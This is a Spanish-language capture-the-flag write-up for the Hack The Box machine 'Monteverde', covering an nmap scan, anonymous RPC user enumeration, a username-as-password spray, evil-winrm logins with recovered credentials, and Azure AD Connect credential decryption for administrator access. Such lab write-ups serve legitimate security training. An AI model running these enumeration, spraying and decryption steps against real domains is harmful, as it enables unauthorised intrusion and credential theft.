Monteverde

https://app.hackthebox.com/machines/223

Reconocimiento

# Nmap 7.94SVN scan initiated Fri Oct 11 10:05:43 2024 as: /usr/lib/nmap/nmap -p135,139,3268,3269,389,445,464,49667,49673,49674,49676,49696,49750,53,593,5985,636,88,9389 -sCV -T5 -oN Targeted 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.045s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-11 14:05:50Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49750/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-11T14:06:40
|_  start_date: N/A

Explotación

Haciendo un reconocimiento básico nos hemos dado cuenta de que podemos acceder a el servicio RPC con la herramienta rpccliente, entonces lo que hemos conseguido es una enumeración de usuarios dentro del DC con el siguiente comando

rpcclient -U '' -N 10.10.10.172 -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' > users.txt

Una vez con este listado de usuarios he probado con muchos ataques hacia el protocolo kerberos como AS-REP Password Spray, etc. al final a la desesperada he hecho una fuerza bruta con crackmapexec de los usuarios y como contraseña el propio usuario y he encontrado lo siguiente

Una vez con las credenciales, veo que no es posible meterme por evil-winrm, así que vamos a enumerar el protocolo smb que es de donde son las credenciales:

Enumerando el smb encontramos este archivo .xml el cual contiene dentro una contraseña, al estar en el escritorio de mhope pruebo a ver si es suya

Efectivamente lo es así que accedemos con evil-winrm a la máquina

evil-winrm -i 10.10.10.172 -u "mhope" -p "4n0therD4y@n0th3r$"

Escalada de Privilegios

Enumerando las carpetas y privilegios encontramos que estamos en el grupo Azure Admins

Esto no es común así que buscamos alguna escalada de privilegios

Azure AD Connect Database Exploit (Priv Esc)VbScrub

Encontramos la siguiente página y seguimos paso a paso lo que nos dice

Subimos los dos Archivos:

Releases · VbScrub/AdSyncDecryptGitHub

Una vez con estos dos archivos subidos nos dirigimos a la ruta (C:\Program Files\Microsoft Azure AD Sync\bin) y ejecutamos el siguiente comando:

Ahora con evil-winrm podremos entrar como usuario administrador y recoger la flag root.txt

evil-winrm -i 10.10.10.172 -u "Administrator" -p 'd0m@in4dminyeah!'